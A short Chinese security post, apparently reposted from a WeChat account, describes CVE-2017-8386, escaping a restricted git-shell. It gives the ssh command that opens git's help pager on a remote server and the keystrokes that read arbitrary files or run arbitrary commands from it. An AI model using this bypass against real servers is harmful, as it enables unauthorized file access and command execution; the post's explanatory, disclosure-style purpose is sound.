Git Shell Bypass
2020-02-16 11:31:28 Author: mp.weixin.qq.com(查看原文) 阅读量:73 收藏


通过git读文件:

git-receive-pack '--help' #本地

ssh git@remoteserver "git-receive-pack '--help'" #远程服务器

打开以后按shift+e,然后输入要读的文件路径

通过git执行命令:

git-receive-pack '--help' #本地

ssh git@remoteserver "git-receive-pack '--help'" #远程服务器

输入!后输入要执行的命令:

详情:

https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/

文章出处:Evi1cg's blog   

原文链接:

https://evi1cg.me/archives/CVE_2017_8386.html

推荐文章++++

*bypass waf入门之sql注入 [ 内联注释篇 ]

*我的WAF Bypass实战系列


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650459795&idx=3&sn=76147e2be42c63fa74d5b9ce09002109&chksm=83bbab77b4cc2261fb07d5876dd6ed3dcc59109ed3241ce6369a3895ea70dbcbb1d74f67e2fc#rd
如有侵权请联系:admin#unsafe.sh